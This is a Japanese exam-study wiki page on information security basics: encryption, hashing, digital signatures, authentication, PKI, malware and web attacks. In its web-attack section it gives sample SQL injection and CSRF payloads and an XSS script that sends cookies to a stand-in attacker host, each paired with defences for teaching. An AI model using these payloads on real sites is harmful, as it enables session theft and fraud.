掲載内容は正確性・最新性の確保に努めていますが、一次情報をご確認ください。
shindanshi中小企業診断士 wiki

情報セキュリティの基礎

CIA + 4要素、暗号化、ハッシュ、電子署名、認証、マルウェア、Web攻撃、対策技術を整理する

このページの役割

このページは、情報セキュリティの基礎 を整理するページです。

情報セキュリティとは、単に「攻撃を防ぐ」ことではなく、「データを正確に、許可された人だけが、必要な時にアクセスできる状態を保つ」ことです。そのために、何を守るのか(目的)どうやって守るのか(技術)何から守るのか(脅威) の 3 つの視点が必要です。

このページでは、まず CIA と 4 要素 で「守る対象」を定義し、次に 暗号化 / ハッシュ / 電子署名 / 認証 で「守る方法」を学び、最後に マルウェア / Web 攻撃 / その他脅威 で「守るべき対象」を整理します。

学習のポイント

  • まず CIA真正性 / 責任追跡性 / 否認防止 / 信頼性 の 7 要素を、それぞれ「何のために必要か」で理解する
  • 次に 共通鍵暗号公開鍵暗号 の仕組みと、なぜ鍵の個数が異なるのかを理解する
  • そのうえで ハッシュ関数デジタル署名 が「どの要素を実現するのか」を対応させる
  • 認証 の 3 要素と多要素認証の組み合わせを、それぞれの強度で区別する
  • FAR / FRR / EER を、生体認証の精度指標として読み分ける
  • LDAP / RADIUS / Kerberos の役割の違いを切り分ける
  • マルウェア / SQL インジェクション / XSS / CSRF を、「何を狙うのか」と「どう防ぐのか」で分類する
  • ネットワークセキュリティ対策ゼロトラスト の考え方の違いを理解する
  • タイムスタンプ電子署名 の役割の違いを区別する
  • ISMS のリスク分析アプローチの違いを比較する

試験で何が問われるか

  • CIA真正性 / 責任追跡性 / 否認防止 / 信頼性 の 7 要素の違いを説明できるか
  • 共通鍵暗号公開鍵暗号 の仕組みを述べ、n人での鍵個数を計算できるか
  • ハッシュ関数デジタル署名 の 5 ステップの手順を述べ、秘密鍵と公開鍵の使用順序を正確に言えるか
  • 認証 の 3 要素(知識 / 所持 / 生体)の違いと、多要素認証が何をもたらすかを説明できるか
  • FAR / FRR / EER の定義とトレードオフを説明できるか
  • LDAP / RADIUS / Kerberos の役割の違いを区別できるか
  • マルウェア / SQL インジェクション / XSS / CSRF の攻撃対象と防御策を正確に対応させられるか
  • ファイアウォール / IDS / IPS / WAF / VPN の位置づけと役割の違いを説明できるか
  • 従来の境界型防御ゼロトラスト の基本方針の違いを理解しているか
  • タイムスタンプ電子署名 の役割の違いを説明できるか
  • ISMS のリスク分析アプローチの違いを比較できるか

定義と仕組み

セキュリティの 3 要素 (CIA) と 4 要素

情報セキュリティで守る対象は、次の 7 つです。まずは「何のために必要か」に着目して理解することが重要です。

要素英語説明実生活の例
機密性Confidentiality許可された人だけが情報にアクセスできることメールの内容を本人と受信者だけが見られる
完全性Integrity情報が改ざんされていないこと、正確なままであることダウンロードしたファイルが送信時と同じ内容である
可用性Availability必要な時に情報やサービスが使える状態であることWebサイトがアクセス可能で、データベースはいつでも照会できる
真正性Authenticity通信相手や情報の出所が本物であること受け取ったメールが本当にその人から来たのか確認できる
責任追跡性Accountability誰が何をしたか記録に残り、追跡できること誰がいつどのデータを変更したかログに記録される
否認防止Non-repudiation本人が行動や通信を後で否定できないこと送信した電子メールについて「送っていない」と言い張れない
信頼性Reliabilityシステムが意図した通りに正常に機能し続けることプログラムが想定外の動作をしない

それぞれの技術との対応

これらの 7 要素は、異なる技術で実現されます:

  • 暗号化 = 機密性 を実現(データを読めなくする)
  • ハッシュ関数 = 完全性 を実現(改ざんを検知する)
  • 電子署名 = 真正性否認防止 を同時に実現(出所を証明し、送信者が否定できなくする)
  • 認証技術 = 真正性 を実現(相手が本当にその人か確認する)
  • ファイアウォール / IDS / IPS = 可用性 を実現(攻撃を防ぎ、システムが使える状態を保つ)

このように、複数の技術を組み合わせることで、初めて包括的なセキュリティが実現されます。

暗号化方式

暗号化とは、元のデータ(平文)を特定の規則(鍵)に基づいて読めない形(暗号文)に変換し、受信者だけが復号化できるようにする技術です。暗号化には 2 つの方式があり、それぞれメリット・デメリットが異なります。

共通鍵暗号 (対称鍵暗号)

同じ鍵で暗号化と復号化を行う方式です。 送信者が「あなたの鍵は 2024」で暗号化すれば、受信者も「鍵 2024」で復号化します。

特徴詳細なぜ重要か
仕組み送信者と受信者が同じ鍵を持つシンプルで理解しやすい
処理速度速い大容量データの暗号化に適する
鍵配送事前に安全に鍵を共有する必要がある(鍵配送問題人数が増えると鍵管理が複雑になる
n 人での鍵個数n(n-1)/2組織内での運用が難しくなる
代表例AES、3DESAES は現在推奨される標準

鍵配送問題とは何か

10 人が各自 1 対 1 で安全に通信したいとします。AさんとBさんが通信するとき、2人だけが知っている秘密鍵が必要です。しかし、AさんとCさんが通信するときは別の秘密鍵が必要です。この秘密鍵を「事前にどうやって安全に共有するか」が問題になります。

鍵の個数計算例(10 人の場合)

10 人が各自 1 対 1 で通信する場合、それぞれのペアに異なる鍵が必要です:

  • ペアの数 = C(10,2) = 10 × 9 ÷ 2 = 45 本

Aさんが Bさんと通信するための鍵を、CさんやDさんと共有することはできません(そうしたら、CさんがAさんとBさんの通信を盗聴できてしまいます)。つまり、人数が増えると必要な鍵の本数が急速に増え、管理が困難になります。

公開鍵暗号 (非対称鍵暗号)

異なる 2 つの鍵を使う方式です。 公開鍵(世界中に公開してよい)と秘密鍵(自分だけが持つ)のペアを使い分けます。

特徴詳細なぜ重要か
仕組み公開鍵で暗号化 → 秘密鍵で復号化鍵を事前に共有する必要がない
処理速度遅い小容量データやハンドシェイク段階での使用が多い
鍵配送公開鍵は「公開」するので配送問題がないインターネット上で誰にでも配布可能
n 人での鍵個数2n 個(各人が公開鍵 1 + 秘密鍵 1)人数が増えても鍵管理がシンプル
代表例RSA、楕円曲線暗号(ECC)ECC は計算効率が良く、次世代標準

公開鍵暗号が解決する問題

従来の共通鍵暗号では、秘密鍵を事前に安全に交換する必要がありました。しかし、公開鍵暗号なら、公開鍵はインターネットで自由に公開でき、受信者だけが秘密鍵を持ちます。つまり、初めて会う人とも安全に通信できるようになります。

鍵の個数計算例(10 人の場合)

10 人が各自、公開鍵 1 つ + 秘密鍵 1 つを持ちます:

  • 鍵の個数 = 2 × 10 = 20 個

AさんがB〜Jさんと通信する場合、各人の公開鍵さえあればよく、秘密鍵を共有する必要はありません。Bさんの公開鍵は世界中に知られていてもかまいません。Bさんだけが自分の秘密鍵を持っているからです。

ハイブリッド暗号 (実際の運用)

現実には、共通鍵暗号と公開鍵暗号の両方を使い分けます。

これが ハイブリッド暗号 です。理由は以下の通りです:

  • 共通鍵暗号 = 高速だが、鍵配送が問題
  • 公開鍵暗号 = 鍵配送が不要だが、処理が遅い

そこで、次のように組み合わせます:

  1. 通信開始時:公開鍵暗号で、送受信者が「この通信で使う共通鍵」を安全に交換する(鍵交換フェーズ
  2. データ送信:その共通鍵を使って、大容量の実際のデータを高速に暗号化・復号化する(データ転送フェーズ

この組み合わせを ハイブリッド暗号 と呼びます。SSL/TLS や HTTPS、金融機関のインターネットバンキングなど、現在のほぼ全ての安全な通信がこの方式です。

ハイブリッド暗号の利点

  • 鍵交換は安全(公開鍵暗号)
  • データ転送は高速(共通鍵暗号)
  • 初対面の相手ともインターネット経由で安全に通信可能

暗号化 / 圧縮 / 符号化 の違い

過去問では、暗号化圧縮符号化 をわざと近い表現で並べてきます。ここは 何のために変換するのか で切ると迷いにくくなります。

用語主目的元に戻せるか典型例問題文の合図
暗号化秘密にする鍵があれば戻せるAES、RSA、TLS盗聴防止、機密性、復号、鍵
圧縮容量を減らす可逆圧縮は戻せる。非可逆圧縮は完全には戻らないZIP、JPEG、MP3容量削減、転送効率、ファイルサイズ
符号化扱いやすい表現に変えるルールに従えば戻せる文字コード、Base64、音声のデジタル化表現変換、コード化、文字コード、データ形式

暗号化 は秘密保持が目的で、圧縮 は効率化が目的、符号化 は表現形式の変換が目的です。圧縮しただけでは秘密にならないBase64 にしただけでは暗号化ではない と切れるようにしてください。

ハッシュ関数

ハッシュ関数とは、任意の長さの入力から固定長の値(ハッシュ値)を生成する一方向関数です。 暗号化とは異なり、元のデータに戻すことはできません。その代わり、データが少しでも変わると、全く異なるハッシュ値が生成されます。

ハッシュ関数の 3 つの重要な特性

特性説明実生活の例
一方向性ハッシュ値から元のデータを復元できない(復号化不可)パスワードのハッシュ値を見ても、元のパスワードがわからない
衝突耐性異なるデータから同じハッシュ値が出にくい(強衝突耐性)2 人の異なるパスワードが同じハッシュ値になることは(ほぼ)ない
変更検知性データが 1 文字変わると、ハッシュ値が全く変わる改ざんされたデータを見つけやすい

なぜ一方向なのか?

暗号化は「元のデータに戻すこと」が目的ですが、ハッシュ関数は「データが改ざんされていないことを検証すること」が目的です。だから、一方向でいいのです。むしろ、復号化できないからこそ、パスワードのように「本人しか知らない秘密」を安全に保管できます。

関数ハッシュ値の長さ用途現在の評価使用推奨
MD5128 ビットパスワードハッシュ、ファイル整合性確認(古い)脆弱(衝突攻撃が可能)新規利用禁止
SHA-1160 ビットデジタル署名、TLS/SSL(古い)脆弱(衝突が報告されている)新規利用禁止
SHA-256256 ビットセキュリティが必要な場面全般(推奨)強(十分に安全)現在推奨
SHA-3224/256/384/512 ビット最新仕様強(将来の標準)次世代標準

ハッシュ関数を使わない場合の危険性

もし企業が「パスワード = db_password」として、元のパスワードをデータベースに保存していたら、ハッカーに盗まれたとき、全員のパスワードが漏洩してしまいます。しかし、ハッシュ値 SHA-256(db_password) が盗まれても、元のパスワードを復元することはできないため、他のシステムへの被害を最小限に抑えられます。

用途例

  • パスワード保存SHA-256(ユーザーのパスワード) をデータベースに保存。ハッキングされても元のパスワードは復元不可
  • ファイル整合性確認:ダウンロード開始前に公開されているハッシュ値と、ダウンロード後のハッシュ値を比較。改ざんされていれば値が異なる
  • デジタル署名:ドキュメント全体を暗号化するのではなく、そのハッシュ値を暗号化・署名する(高速)

デジタル署名

デジタル署名とは、ドキュメントのハッシュ値を秘密鍵で暗号化し、「このドキュメントは本当に私が送信した(否認防止)」「改ざんされていない(完全性)」「送信者は本物である(真正性)」ことを証明する仕組みです。

なぜ必要か

実生活で重要な契約書には署名をします。手書きの署名は「この人が確かに署名した」という証拠になります。デジタル世界でも同じことが必要です。電子メールを送ったあと、「いや、僕は送っていない」と言い張られることを防ぐためです。

5 ステップの手順

デジタル署名は送信者側と受信者側で異なる処理をします:

ステップ操作使用する鍵説明
1. ハッシュ生成(送信者)ドキュメント → ハッシュ関数なしドキュメント全体を要約(指紋のようなもの)
2. ハッシュを秘密鍵で暗号化(送信者)ハッシュ値 H → 秘密鍵で暗号化送信者の秘密鍵これが「デジタル署名 S」
3. ドキュメント + 署名を送信(送信者)ドキュメント + デジタル署名 S を受信者に送信なしインターネット経由で送信
4. ハッシュ生成(受信者)受信したドキュメント → ハッシュ関数なし受信したドキュメントから新しいハッシュ値 H' を生成
5. 署名を公開鍵で復号化(受信者)デジタル署名 S → 送信者の公開鍵で復号化送信者の公開鍵H' と復号化した値 H'' を比較

署名検証の結果

  • H' == H'' → 署名は有効(ドキュメントは改ざんされておらず、送信者は本物)
  • H' ≠ H'' → 署名は無効(ドキュメントが改ざんされた、または送信者が本物ではない)

暗号化との違い(鍵の使用順序がポイント)

これが試験で最も混同されるポイントです:

目的鍵の使用順序秘密鍵の所有者実現する要素
機密性(暗号化)公開鍵で暗号化 → 秘密鍵で復号化受信者(データを読みたい人)「許可された人だけがデータを読める」
真正性・否認防止(デジタル署名)秘密鍵で暗号化 → 公開鍵で復号化送信者(署名する人)「この人が確かに送信した」「改ざんされていない」

なぜ暗号化と署名で鍵の使用順序が逆なのか

  • 暗号化:受信者だけが秘密鍵を持っているので、受信者だけが復号化できる(読める)
  • 署名:送信者だけが秘密鍵を持っているので、送信者だけが署名できる(本人確認)

つまり、「秘密鍵を持っている人」が異なるため、鍵の使用順序が自動的に決まるのです。

認証技術

認証とは、ユーザーが「本当にその人であるか」を確認するプロセスです。 これは「その人にアクセス権があるか」を決める認可とは異なります。まず本人であることを確認(認証)してから、その人に何ができるかを決める(認可)という順序です。

認証の強度を上げるには、複数の異なる要素を組み合わせることが有効です。

3 つの認証要素

認証には、大きく 3 つの要素があります:

要素英語説明強度
知識要素Something you knowユーザーが知っている情報パスワード、秘密の質問、PIN弱い(他人に知られやすい)
所持要素Something you haveユーザーが物理的に持っているものスマートフォン、セキュリティキー、ICカード、トークン中程度(紛失や盗難のリスク)
生体要素Something you areユーザーの身体的特性指紋、顔、虹彩、音声、静脈認証強い(複製困難)

各要素の仕組み

  • 知識要素の例:ユーザーがログイン画面にパスワードを入力
  • 所持要素の例:スマートフォンに SMS で 6 桁の認証コードが届く、認証アプリが表示する時間ベースコード
  • 生体要素の例:スマートフォンの指紋認証、顔認証で本人確認

多要素認証 (MFA: Multi-Factor Authentication)

複数の異なる要素を組み合わせて認証強度を高めます。

認証方式構成要素強度レベル実装例適用場面
単一要素知識のみパスワードだけ非推奨(セキュリティが不十分)
2 要素認証知識 + 所持パスワード + SMS コードSNS、メール、オンラインショップ(標準的)
2 要素認証知識 + 生体パスワード + 指紋認証スマートフォン解除、銀行アプリ
2 要素認証所持 + 生体セキュリティキー + 指紋社内 VPN、機密データアクセス
3 要素認証知識 + 所持 + 生体最高パスワード + セキュリティキー + 指紋金融機関、政府機関、機密情報へのアクセス

多要素認証が効果的な理由

1 つの認証要素が破られてもダメージを最小限に抑えられます:

  • パスワードが流出 → SMS コードがあれば不正ログインを防げる
  • スマートフォン紛失 → パスワードがあれば完全には乗っ取られない
  • 指紋が複製される → パスワードもあれば追加防御層になる

よくある混同:「多段階認証」と「多要素認証」は違う

  • 多段階認証:パスワード → セキュリティの質問 → メール認証(すべて知識要素の組み合わせ)→ 強度が上がらない
  • 多要素認証:パスワード(知識) + SMS コード(所持)→ 強度が上がる

試験では「パスワード + 秘密の質問」を「多要素認証か」と聞かれたら「いいえ」が正解です(どちらも知識要素)。

生体認証の評価指標 ─ FAR・FRR・EER

生体認証は「本人かどうか」を判定するため便利ですが、判定を厳しくすると本人も弾きやすくなり、甘くすると他人も通しやすくなります。このトレードオフを表すのが次の 3 指標です。

指標日本語意味低いほど良い観点
FAR他人受入率 / 他人受理率他人なのに本人と判定してしまう割合セキュリティ
FRR本人拒否率本人なのに他人と判定してしまう割合利便性
EER等価エラー率FAR と FRR が等しくなる点のエラー率システム全体の性能比較

読み方のコツ

  • 判定を厳しくする → FAR は下がるFRR は上がる
  • 判定を緩くする → FRR は下がるFAR は上がる
  • EER が低いほど、バランスの良い認証方式と評価しやすい

不正者を通したくない が論点なら FAR、本人を弾きすぎないか が論点なら FRR を見ます。

ワンタイムパスワード / チャレンジレスポンス / リスクベース認証

認証方式の設問では、何を送るのか毎回同じか追加認証の条件は何か を見ると切り分けやすくなります。

方式仕組み典型例問題文の合図
ワンタイムパスワード(OTP)毎回異なる使い捨てパスワードで認証する認証アプリの 6 桁コード、SMS コード一度しか使えない、毎回変わる、使い捨て
チャレンジレスポンス認証サーバが乱数(チャレンジ)を出し、利用者側が秘密情報を使って応答を計算するパスワードそのものを送らない認証乱数、チャレンジ、応答、秘密情報を直接送らない
リスクベース認証端末、場所、時刻などの状況を見て、普段と違うときだけ追加確認する海外からのログイン時に追加コード要求普段と違う環境、追加認証、場所・端末・時間で判断

OTP毎回違う値チャレンジレスポンス秘密そのものを送らない仕組みリスクベース認証状況に応じて認証強度を変える考え方 です。一度認証したら全システムで再認証不要SSO の話であり、OTP とは別です。

シングルサインオン (SSO) と関連技術

複数のサービスに 1 回の認証でアクセスできる仕組みです:

プロトコル位置づけ説明用途実装例
SAML (Security Assertion Markup Language)認証情報を伝達認証情報を XML 形式で送信エンタープライズ SSO(社内システム連携)大企業の社員が ID 1 つで複数の社内システムにアクセス
OAuth 2.0認可情報を委譲他のサービスがあなたのリソースに限定的にアクセスすることを許可サードパーティアプリのアクセス権限付与「Google で登録」「Facebook でログイン」
OpenID Connect認証 + 認可OAuth 2.0 に認証機能を追加認証と認可の両方が必要な場面モダンな SSO
FIDO (Fast IDentity Online)パスワードレス認証生体認証 + セキュリティキーで強力に認証パスワード不要な次世代認証Windows Hello、生体認証デバイス

SAML と OAuth 2.0 の違いに注意

  • SAML:「あなた本当に A さんですか?」(認証)
  • OAuth 2.0:「Google さん、この人があなたの Google Drive にアクセスすることを許可する」(認可)

OAuth は認証ではなく認可なので、「Google でログイン」と言われても、実はその背後で別の認証技術が使われている場合が多いです。

SAML / OAuth 2.0 / OpenID Connect / LDAP / RADIUS / Kerberos を 1 枚で切る

認証関連の設問では、ユーザー情報を持つ仕組み認証結果を他サービスへ渡す仕組みネットワーク接続時の認証 が混在します。どの層で何をしているか を分けると崩れにくくなります。

用語主な役割何を扱うか典型的な使われ方問題文の合図
SAML認証結果の連携「この人は認証済み」というアサーション社内システム間の SSOSSO、認証情報を引き回す、企業内連携
OAuth 2.0認可の委譲「この範囲だけアクセスしてよい」という権限外部サービスへの API 利用許可権限委譲、トークン、外部アプリ連携
OpenID Connect認証 + 認可OAuth 2.0 に本人確認を追加モダンなログイン基盤、ID 連携ログイン、ID トークン、認証も必要
LDAPユーザー情報の保管・検索ID、所属、属性情報社員ディレクトリ、認証基盤の情報源ディレクトリ、ユーザー属性、階層管理
RADIUSネットワーク接続時の認証連携認証要求、認可結果、課金情報Wi-Fi、VPN、リモートアクセスアクセスサーバ、無線 LAN、VPN 認証
Kerberosチケットベース認証事前発行された認証チケットActive Directory、社内 SSOチケット、相互認証、AD

ログインに使う と書いてあっても、実際に問われているのが 認証そのもの なのか 権限委譲 なのか 認証基盤のユーザー台帳 なのかは別です。外部アプリに Google Drive への限定アクセスを許可 なら OAuth 2.0、社員 ID を管理する台帳 なら LDAP、一度の認証で複数システムへ入る なら SAML または OpenID Connect を疑う順番が安全です。

FIDO / パスキー / ワンタイムパスワード / SSO を切り分ける

近年の過去問では、パスワードレス認証ワンタイムコード一度の認証で複数サービスへ入る仕組み を混ぜてきます。ここは 何を使って本人確認するのか認証結果をどう使うのか を分けるのがコツです。

用語位置づけ何をしているか問題文の合図
FIDOパスワードレス認証の標準群公開鍵暗号と認証器で本人確認するFIDO2、WebAuthn、フィッシング耐性
パスキーFIDO ベースの認証情報複数デバイスで同期される認証情報を用いる複数端末で同じ認証情報、パスワード不要
ワンタイムパスワード使い捨てコード認証毎回異なるコードを使うSMS、認証アプリ、6桁コード
SSO認証結果の再利用一度の認証で複数システムへ入る再ログイン不要、複数システム

パスキーFIDO の考え方に基づく認証情報であり、OTP のように毎回コードを入力する方式とは別です。また、SSO は認証を楽にする仕組みであって、パスワードレス そのものではありません。顔認証や指紋認証は、端末上でパスキーを解放する手段として使われることがありますが、生体認証 = パスキー と同一視しないようにしてください。

LDAP・RADIUS・Kerberos の位置づけ

認証基盤の問題では、誰の情報を持つか誰が認証するかどうやってチケットを渡すか を切り分けると混同しにくくなります。

用語役割何を持つか / 何をするか典型的な使われ方
LDAPディレクトリサービスユーザー ID、所属、属性情報を階層構造で管理社内アカウント台帳、SSO のユーザー情報源
RADIUS認証・認可・課金のプロトコルネットワーク機器から認証要求を受け、認証サーバーで判定Wi-Fi、VPN、リモートアクセス
Kerberosチケットベース認証パスワードを都度送らず、発行済みチケットで本人確認Active Directory 環境、社内システム認証

試験での見分け方

  • 利用者情報を保存・検索する仕組み なら LDAP
  • ネットワーク機器と認証サーバーのやり取り なら RADIUS
  • チケットシングルサインオン相互認証 が出れば Kerberos を疑います

公開鍵基盤 (PKI: Public Key Infrastructure)

公開鍵暗号には 1 つの問題があります。「その公開鍵は本当にその人のものなのか」をどうやって確認するのか、ということです。

例えば、あなたが Amazon から「公開鍵」を受け取ったとします。しかし、その鍵が本当に Amazon のものなのか、攻撃者が偽造した鍵ではないのか、どうやって確認しますか? PKI は、この「公開鍵の身元確認」を実現するための体制です。

要素役割実生活との類似
認証局 (CA: Certification Authority)「この公開鍵は本当にこの人のものです」という電子証明書を発行し、失効管理公的機関が発行する身分証明書(パスポート、運転免許証)
登録局 (RA: Registration Authority)申請者の身元を確認し、CA に申請を仲介市役所や警察署で身分確認を行う職員
電子証明書ユーザー情報、公開鍵、有効期限、CA の電子署名を含むデータパスポートや運転免許証そのもの
CRL (Certificate Revocation List)失効した証明書のリスト(例:鍵が漏洩した時)紛失・盗難が報告された免許証の失効リスト
OCSP (Online Certificate Status Protocol)証明書の有効性をリアルタイムで確認するプロトコルデータベースで「この免許証はまだ有効か」をその場で確認

PKI の仕組みの流れ

  1. 証明書申請:Webサイト運営者が CA に「この公開鍵は僕のものです、証明書をください」と申請
  2. 身元確認:CA(または RA)が「本当にこの組織が存在するのか」を確認
  3. 電子証明書発行:CA が「この公開鍵は ✓✓✓ 会社のもの」と電子署名して証明書を発行
  4. ブラウザによる検証:あなたが Amazon にアクセスすると、ブラウザが Amazon から証明書を受け取り、CA の署名で検証(「この証明書は本物か」)
  5. アドレスバーの表示:検証が成功すれば、アドレスバーが緑色になり、鍵マークが表示される

HTTPS 通信の背後にある PKI

あなたが https://amazon.co.jp にアクセスするとき、実は以下が起きています:

  • Amazon は「Amazon の公開鍵です」という電子証明書を提示
  • 大手 CA(VeriSign など)が電子署名で「本物です」と保証
  • あなたのブラウザが「CA の署名は有効か」を確認
  • 確認できれば、その公開鍵で通信を暗号化

電子署名 / 電子証明書 / 認証局 / PKI の切り分け

電子署名電子証明書 は近い場所で使われるため混同しやすいですが、役割は別です。署名する道具公開鍵の身元証明書 を分けて考えます。

用語何者か主な役割ひとことで言うと
電子署名データに付ける署名情報作成者本人性、改ざん検知、否認防止を示す「この文書は私が出した」
電子証明書公開鍵と本人・組織を結びつける証明書その公開鍵が誰のものかを示す「この公開鍵は確かにこの会社のもの」
認証局(CA)証明書を発行・失効管理する第三者機関電子証明書に信頼を与える「身元確認して証明書を出す役所」
PKI認証局や証明書を含む運用基盤全体公開鍵の身元確認を成り立たせる「公開鍵を信頼して使うための体制」

順番で言うと、PKI という体制の中で 認証局電子証明書 を発行し、その証明書を使って相手の公開鍵を信頼できるようになり、その先で 電子署名 の検証や HTTPS の安全な通信が成立します。

CRL / OCSP の違い

証明書に関する設問では、失効した証明書をどう確認するか が問われることがあります。ここは、一覧をまとめて配るかその場で問い合わせるか の違いで覚えると切りやすいです。

用語何をするか向いている使い方注意点
CRL失効した証明書の一覧を配布するまとめて定期確認したいとき配布後に最新状態とずれることがある
OCSP証明書 1 件ごとに有効性を問い合わせるリアルタイムに確認したいとき問い合わせ先への通信が必要

この証明書は今も有効か をその場で確認するなら OCSP失効済み一覧を見て照合する なら CRL が基本です。どちらも 誰の証明書か を証明するものではなく、すでに出ている証明書がまだ使えるか を確認する仕組みです。

タイムスタンプと電子保存

タイムスタンプ は、ある電子文書がその時刻に存在し、その後改ざんされていないことを第三者が証明する仕組み です。電子署名が 誰が作成したか に強いのに対し、タイムスタンプは いつ存在していたかその後の改ざん有無 に強いという違いがあります。

観点電子署名タイムスタンプ
主に証明したいこと作成者本人性、否認防止存在時刻、改ざん防止
中核技術秘密鍵による署名、公開鍵で検証ハッシュ値と時刻情報を第三者が証明
典型用途契約、申請、証明書発行電子文書保存、証跡管理、長期保存

過去問では電子帳簿保存法の旧要件を題材に、タイムスタンプが必要か を問う問題もありました。受験上はまず、タイムスタンプは「時刻証明」電子署名は「本人証明」 と切ることが重要です。実務での細かな保存要件は制度改正があるため、最新要件を個別に確認してください。

暗号化・認証まとめ

暗号化と認証の使い分け

  • 暗号化 (encryption) = データを読めなくする(機密性を守る)
  • 認証 (authentication) = 通信相手が本物か確認する(真正性を確認する)
  • デジタル署名 = ハッシュ値を秘密鍵で署名し、真正性と否認防止を実現
  • ハッシュ関数 = データの改ざんを検知(完全性確認)

マルウェアと脅威

マルウェアの種類

種類特徴感染方法影響
ウイルス自己増殖する。プログラムに寄生感染ファイル実行時データ破壊、情報盗取
ワーム自己増殖する。独立したプログラムネットワーク経由(パッチ未適用など)ネットワーク通信の大量発生
トロイの木馬自己増殖しない。無害に見えるが裏で悪意ある処理ダウンロード、メール添付情報盗取、遠隔操作
ランサムウェアファイルを暗号化し、復号化キーの身代金を要求メール添付、脆弱性悪用事業停止、経済的被害
スパイウェアユーザーの行動や情報を収集フリーソフト、広告サイトプライバシー侵害、スロー化
ボット(ボットネット)遠隔から操作される。DDoS 攻撃に悪用ワーム+トロイの木馬のような感染攻撃のリソース化

Web 攻撃

Web 攻撃を理解する最大のポイントは「何を狙うのか」を見極めることです。 SQL インジェクション、XSS、CSRF は一見似ていますが、攻撃対象が全く異なります。

主要な 3 つの Web 攻撃比較

攻撃攻撃対象仕組み防御策つまずきやすさ
SQL インジェクションサーバー側のデータベース入力欄に SQL コマンドを混ぜ込み、不正な SQL を実行させるプリペアドステートメント、入力値の検証DB を狙う
XSS (クロスサイトスクリプティング)クライアント側(他のユーザーのブラウザ)入力欄に JavaScript を埋め込み、他のユーザーが閲覧時にスクリプトを実行させる出力値のエスケープ、CSP ヘッダブラウザを狙う
CSRF (クロスサイトリクエストフォージェリ)認証済みユーザーの権限と信頼性別サイトから、ユーザーが認証済みの状態を悪用して不正リクエストを送信CSRF トークン検証、SameSite クッキーユーザーのセッションを狙う

なぜ 3 つに分けて考えるのか

1 つの防御策がすべての攻撃に対応することはできません。攻撃対象が異なるため、防御策も異なるからです:

  • SQL インジェクションはプログラムのロジックレベルで防ぐ
  • XSS はブラウザでの実行を防ぐ
  • CSRF はリクエストの正当性を検証して防ぐ

詳細な仕組みと具体例

1. SQL インジェクション

「データベースを狙い、不正なデータを取得・削除・改ざんする」攻撃です。

具体的な攻撃例

ユーザー名入力欄に以下を入力:' OR '1'='1
→ SQL: SELECT * FROM users WHERE name='' OR '1'='1'
→ '1'='1' は常に true なので、全ユーザーの情報が返される

防御策

  • プリペアドステートメント:SQL の構造とデータを分離して実行(最も有効)
  • 入力値の検証:英数字のみ許可するなど、入力内容を制限
  • エスケープ処理:特殊文字を無害化

2. XSS (クロスサイトスクリプティング)

「他のユーザーのブラウザで悪意あるスクリプトを実行させる」攻撃です。

具体的な攻撃例

ショッピングサイトのコメント欄に以下を入力:
<script>fetch('https://attacker.com?cookie='+document.cookie)</script>

→ 他のユーザーがそのページを訪問
→ ブラウザが JavaScript を実行
→ その人の Cookie(セッションID など)が攻撃者に送られる

防御策

  • 出力時のエスケープ:HTML タグを無害化(<&lt; など)
  • Content Security Policy (CSP) ヘッダ:ブラウザにどのスクリプトを実行するか指定
  • 入力値の検証:HTML タグを許可しない

3. CSRF (クロスサイトリクエストフォージェリ)

「ユーザーが気付かないうちに、認証済みセッションを使って不正リクエストを送信させる」攻撃です。

具体的な攻撃例

1. あなたが銀行アプリでログイン → セッション ID が Cookie に保存
2. あなたが攻撃者のサイトを訪問
3. そのサイトの HTML に以下が埋め込まれている:
   <img src="https://bank.com/transfer?to=attacker&amount=1000000" />
4. ブラウザがこのリクエストを自動実行
5. あなたの Cookie(セッション ID)が一緒に送られる
6. 銀行のサーバーは「このセッションは認証済みだ」と認識 → 送金実行

防御策

  • CSRF トークン検証:GET や POST リクエストに、サーバーが生成した「ワンタイムトークン」を含める。攻撃者は事前にこのトークンを知らない
  • SameSite クッキー属性:Cookie を「同じサイトからのリクエストのみ」に限定
  • ダブルサブミット法:リクエストの body と header に同じ値を含めさせ、サーバーで一致を確認

WAF / CSP / SameSite をどう切り分けるか

Web セキュリティでは、どれも対策っぽい という覚え方だと崩れます。ここは どこで効くか を先に固定してください。

技術どこで効くか主な役割典型キーワード向いている場面
WAFWeb サーバーの前面悪意ある HTTP リクエストを検知・遮断するリバースプロキシ、Web アプリ前面、シグネチャSQL インジェクション、XSS などの攻撃を入口で止めたい
CSPユーザーのブラウザ読み込めるスクリプトや画像の出所を制限するContent-Security-Policyscript-src、ヘッダXSS で不正スクリプトを実行される被害を抑えたい
SameSiteCookie の送信条件クロスサイトからのリクエストで Cookie を送りにくくするSet-CookieLaxStrictCSRF のように認証済みセッションを悪用されにくくしたい

WAFサーバーの手前CSPブラウザの中SameSiteCookie の振る舞い を制御します。リクエストを止めるのかブラウザでの実行を抑えるのかCookie を送らせないのか の違いで整理してください。

クリックジャッキングと X-Frame-Options をどう切るか

クリックジャッキングは、透明な iframe などを重ねて、利用者が見えているボタンと実際に押しているボタンをずらす 攻撃です。XSS のようにスクリプトを注入するのではなく、画面の見せ方 を悪用します。

観点クリックジャッキングXSS
何を悪用するか画面の重ね合わせ、iframe 埋め込みブラウザでのスクリプト実行
主な対策X-Frame-Optionsframe-ancestors、重要操作前の再確認エスケープ、CSP
合図になる語iframe、埋め込み、重ねる、見えないボタンscript、Cookie、入力欄、出力

X-Frame-Optionsこのページを他サイトの frame に埋め込ませない ためのレスポンスヘッダです。最近は CSP の frame-ancestors で同様の制御をすることもありますが、受験ではまず クリックジャッキング → X-Frame-Options で切れれば十分です。

その他の脅威

脅威説明対策
フィッシングメール等で偽サイトへ誘導し、パスワードやカード情報を窃取メール認証(DMARC、SPF、DKIM)、ユーザー教育
標的型攻撃特定組織の従業員を狙ったメール送信 → 潜在的な脅威をインストールファイアウォール、メールフィルタリング、EDR
ブルートフォース攻撃パスワードを総当たりで試すパスワード複雑化、ロック機能、多要素認証
ゼロデイ脆弱性未発見の脆弱性を悪用パッチ管理、IPS/WAF、ソースコード監査
HeartbleedOpenSSL の Heartbeat 実装不備を突き、メモリ内容を読み取る脆弱性ライブラリ更新、証明書・鍵の再発行、影響範囲確認
ソーシャルエンジニアリング人的な隙をついて情報を窃取ユーザー教育、内部統制、監査ログ
サプライチェーン攻撃納入業者を経由して攻撃ベンダー管理、最小権限の原則、監視

セキュリティ対策技術

ネットワークセキュリティ対策

ネットワークセキュリティ対策は、「どこに何を置くか」で理解することが重要です。 組織の外側から内側に向かって、複数の防御層を配置する「層防御(Defense in Depth)」が標準です。

技術位置づけ役割検知/防止対象実装例
